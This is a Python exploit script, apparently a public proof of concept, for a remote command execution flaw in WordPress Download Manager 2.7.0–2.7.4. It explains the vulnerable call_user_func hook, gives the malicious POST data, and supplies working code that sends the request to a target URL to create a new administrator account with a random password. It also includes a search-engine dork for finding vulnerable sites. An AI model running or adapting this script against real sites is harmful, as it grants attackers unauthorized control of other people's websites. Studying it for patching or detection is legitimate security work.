
rce

  1. #!/usr/bin/python
  2. #
  3. # Exploit Name: Wordpress Download Manager 2.7.0-2.7.4 Remote Command Execution
  4. #
  5. # Vulnerability discovered by SUCURI TEAM (http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html)
  6. #
  7. # Exploit written by Claudio Viviani
  8. #
  9. #
  10. # 2014-12-03:  Discovered vulnerability
  11. # 2014-12-04:  Patch released (2.7.5)
  12. #
  13. # Video Demo: https://www.youtube.com/watch?v=rIhF03ixXFk
  14. #
  15. # --------------------------------------------------------------------
  16. #
# The vulnerable function lives in the "/download-manager/wpdm-core.php" file:
  18. #
  19. # function wpdm_ajax_call_exec()
  20. # {
  21. #    if (isset($_POST['action']) && $_POST['action'] == 'wpdm_ajax_call') {
  22. #         if (function_exists($_POST['execute']))
  23. #             call_user_func($_POST['execute'], $_POST);
  24. #         else
  25. #             echo "function not defined!";
  26. #         die();
  27. #     }
  28. # }
  29. #
# Any visitor can trigger wpdm_ajax_call_exec() from any post/page, because it is attached to a WordPress hook.
# wpdm_ajax_call_exec() invokes the function named in the POST data through call_user_func():
  32. #
  33. #         if (function_exists($_POST['execute']))
  34. #             call_user_func($_POST['execute'], $_POST);
  35. #         else
  36. #         ...
  37. #         ...
  38. #         ...
  39. #
# The called function must accept the whole $_POST array as its single argument
  41. #
  42. #
# The WordPress function wp_insert_user fits that calling convention:
  44. #
  45. # http://codex.wordpress.org/Function_Reference/wp_insert_user
  46. #
  47. # Description
  48. #
  49. # Insert a user into the database.
  50. #
  51. # Usage
  52. #
  53. # <?php wp_insert_user( $userdata ); ?>
  54. #
  55. # Parameters
  56. #
  57. # $userdata
  58. #     (mixed) (required) An array of user data, stdClass or WP_User object.
  59. #        Default: None
  60. #
  61. #
  62. #
  63. # Evil POST Data (Add new Wordpress Administrator):
  64. #
  65. # action=wpdm_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
  66. #
  67. # ---------------------------------------------------------------------
  68. #
  69. # Dork google:  index of "wordpress-download"
  70. #
# Tested against Wordpress Download Manager versions 2.7.0 to 2.7.4 on BackBox 3.x with Python 2.6
  72. #
# HTTP connection
import urllib, urllib2, socket
#
import os
import sys
# String manipulator
import string, random
# Args management
import optparse
  81.  
# Check that the URL carries an http:// or https:// scheme
def checkurl(url):
    """Return *url* unchanged when it starts with http:// or https://.

    Only the scheme prefix is inspected; nothing else about the URL is
    validated.  Any other prefix (including a missing scheme) prints an
    error and terminates the process with exit status 1, so the caller
    never receives a return value in that case.
    """
    if url.startswith(("https://", "http://")):
        return url
    print('[X] You must insert http:// or https:// procotol')
    sys.exit(1)
  89.  
# Check that the file exists and is readable
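def checkfile(file):
    """Return *file* if it names an existing, readable regular file.

    Otherwise print an error and terminate the process with exit status 1.
    The parameter name shadows the Python 2 builtin ``file``; it is kept
    so existing callers are unaffected.
    """
    # Both conditions must hold.  Joining the two negated checks with
    # ``and`` (as before) let an existing-but-unreadable file through,
    # contradicting the "missing or not readable" message.
    usable = os.path.isfile(file) and os.access(file, os.R_OK)
    if usable:
        return file
    print('[X] '+file+' file is missing or not readable')
    sys.exit(1)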
  97.  
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    """Build a string of *size* characters, each drawn independently from *chars*.

    Uses random.choice, i.e. the non-cryptographic PRNG, so the output is
    a throwaway identifier rather than a secret.  ``size=0`` yields "".
    """
    picked = []
    for _ in range(size):
        picked.append(random.choice(chars))
    return ''.join(picked)
  100.  
# ASCII-art banner, printed before the request and together with the usage
# text when -t is missing.  This is a non-raw string: the backslashes in the
# art ("\ ", "\|", "\_") are not valid escapes, so Python 2 keeps them as
# literal characters; recent Python 3 releases emit a warning for them.
banner = """
   ___ ___               __
  |   Y   .-----.----.--|  .-----.----.-----.-----.-----.
  |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|
  |. / \ |_____|__| |_____|   __|__| |_____|_____|_____|
  |:      |    ______      |__|              __                __
  |::.|:. |   |   _  \ .-----.--.--.--.-----|  .-----.---.-.--|  |
  `--- ---'   |.  |   \|  _  |  |  |  |     |  |  _  |  _  |  _  |
              |.  |    |_____|________|__|__|__|_____|___._|_____|
              |:  1    /   ___ ___
              |::.. . /   |   Y   .---.-.-----.---.-.-----.-----.----.
              `------'    |.      |  _  |     |  _  |  _  |  -__|   _|
                          |. \_/  |___._|__|__|___._|___  |_____|__|
                          |:  |   |                 |_____|
                          |::.|:. |
                          `--- ---'
                                                  Wordpress Download Manager
                                                     R3m0t3 C0d3 Ex3cut10n
                                                        (Add WP Admin)
                                                         v2.7.0-2.7.4

                              Written by:

                            Claudio Viviani

                         http://www.homelab.it

                            info@homelab.it
                        homelabit@protonmail.ch

                  https://www.facebook.com/homelabit
                     https://twitter.com/homelabit
                   https://plus.google.com/+HomelabIt1/
          https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
  136.  
# Command-line interface: -t/--target is the only required option; --timeout
# (an int, default 10) becomes the socket default below.  `remainder`, the
# positional arguments, is never used.
commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )

options, remainder = commandList.parse_args()

# Check args: with no target, show the banner plus usage and exit with status 1.
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)

# checkurl() only validates the scheme prefix and exits the process itself
# when that check fails.
host = checkurl(options.target)
timeout = options.timeout

print(banner)

# Process-wide default, so the urllib2.urlopen() call below cannot block
# indefinitely on an unresponsive host.
socket.setdefaulttimeout(timeout)

# Random 6-character alphanumeric login and password (see id_generator);
# they are only ever printed, never stored.
username = id_generator()
pwd = id_generator()

# Form-encoded request body with the same fields as the "Evil POST Data" in
# the header comment.  The plugin hook dispatches $_POST['execute'] through
# call_user_func() with the whole $_POST array as argument, which
# wp_insert_user() accepts as its $userdata.
body = urllib.urlencode({'action' : 'wpdm_ajax_call',
                         'execute' : 'wp_insert_user',
                         'user_login' : username,
                         'user_pass' : pwd,
                         'role' : 'administrator'})

# Fixed browser-style User-Agent; it is the only request header set explicitly.
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}

# Python 2 print statement; the misspelling "Tryng" is part of the emitted text.
print "[+] Tryng to connect to: "+host
try:
    # Supplying a body makes this a POST, sent to the site root ("/") rather
    # than to any plugin-specific endpoint, since the hook runs on any
    # post/page load.  Detection note: a POST carrying action=wpdm_ajax_call
    # to an arbitrary page, followed by a new administrator account, is the
    # observable trace of this request on the server side.
    req = urllib2.Request(host+"/", body, headers)
    # urlopen() raises HTTPError for HTTP error statuses and URLError for
    # connection-level failures; both are reported in the handlers below.
    response = urllib2.urlopen(req)
    html = response.read()
    # NOTE(review): response is never closed; the socket is left to garbage collection.

    # Success heuristic: the vulnerable hook calls die() straight after
    # call_user_func() without printing anything, so an empty body is taken
    # as success.  Any other empty response would be misreported the same
    # way, and a non-empty one (presumably the normal page HTML when the hook
    # is absent or patched) counts as failure.
    if html == "":
       print("[!] Account Added")
       print("[!] Location: "+host+"/wp-login.php")
       print("[!] Username: "+username)
       print("[!] Password: "+pwd)
    else:
       print("[X] Exploitation Failed :(")

except urllib2.HTTPError as e:
    print("[X] "+str(e))
except urllib2.URLError as e:
    print("[X] Connection Error: "+str(e))